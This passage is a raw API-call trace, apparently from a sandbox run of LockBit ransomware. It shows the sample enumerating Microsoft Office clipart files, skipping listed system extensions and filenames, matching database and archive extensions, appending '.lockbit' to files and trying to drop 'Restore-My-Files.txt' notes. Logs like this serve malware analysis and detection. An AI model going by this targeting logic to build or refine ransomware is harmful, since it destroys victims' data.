hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.789] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.789] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.790] free (_Block=0x1fa2ed8) [0147.790] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.790] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.790] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.790] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x62e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185778.WMF", cAlternateFileName="")) returned 1 [0147.790] lstrcmpiW (lpString1=".", lpString2="J0185778.WMF") returned -1 [0147.790] lstrcmpiW (lpString1="..", lpString2="J0185778.WMF") returned -1 [0147.790] PathFindExtensionW (pszPath="J0185778.WMF") returned=".WMF" [0147.790] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.790] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.790] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.790] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.790] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.790] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.790] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.791] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.792] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.792] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185778.WMF") returned 1 [0147.793] lstrcmpiW (lpString1="ntldr", lpString2="J0185778.WMF") returned 1 [0147.793] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185778.WMF") returned 1 [0147.793] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185778.WMF") returned -1 [0147.793] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185778.WMF") returned -1 [0147.793] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185778.WMF") returned 1 [0147.793] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185778.WMF") returned -1 [0147.793] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.793] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned=".WMF" [0147.793] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.793] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.793] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.794] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.794] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF.lockbit") returned 72 [0147.794] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0147.799] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.799] malloc (_Size=0x40068) returned 0x3df0008 [0147.799] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=25312) returned 1 [0147.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.800] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.803] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.803] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.803] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.804] free (_Block=0x1fa2ed8) [0147.804] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.804] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.804] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.805] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe956, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185780.WMF", cAlternateFileName="")) returned 1 [0147.805] lstrcmpiW (lpString1=".", lpString2="J0185780.WMF") returned -1 [0147.805] lstrcmpiW (lpString1="..", lpString2="J0185780.WMF") returned -1 [0147.805] PathFindExtensionW (pszPath="J0185780.WMF") returned=".WMF" [0147.805] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.805] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.806] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.806] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.807] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185780.WMF") returned 1 [0147.807] lstrcmpiW (lpString1="ntldr", lpString2="J0185780.WMF") returned 1 [0147.807] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185780.WMF") returned 1 [0147.807] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185780.WMF") returned -1 [0147.807] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185780.WMF") returned -1 [0147.807] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185780.WMF") returned 1 [0147.807] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185780.WMF") returned -1 [0147.807] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.807] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned=".WMF" [0147.807] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.808] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.808] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.809] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.809] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF.lockbit") returned 72 [0147.809] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0147.810] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.810] malloc (_Size=0x40068) returned 0x3e70008 [0147.810] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=59734) returned 1 [0147.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0147.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.812] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0147.812] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.817] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.817] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.819] free (_Block=0x1fa2ed8) [0147.819] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.819] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.819] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x99a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185786.WMF", cAlternateFileName="")) returned 1 [0147.819] lstrcmpiW (lpString1=".", lpString2="J0185786.WMF") returned -1 [0147.819] lstrcmpiW (lpString1="..", lpString2="J0185786.WMF") returned -1 [0147.819] PathFindExtensionW (pszPath="J0185786.WMF") returned=".WMF" [0147.819] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.819] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.819] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.819] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.819] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.819] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.820] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.821] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.821] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185786.WMF") returned 1 [0147.822] lstrcmpiW (lpString1="ntldr", lpString2="J0185786.WMF") returned 1 [0147.822] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185786.WMF") returned 1 [0147.822] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185786.WMF") returned -1 [0147.822] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185786.WMF") returned -1 [0147.822] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185786.WMF") returned 1 [0147.822] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185786.WMF") returned -1 [0147.822] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft 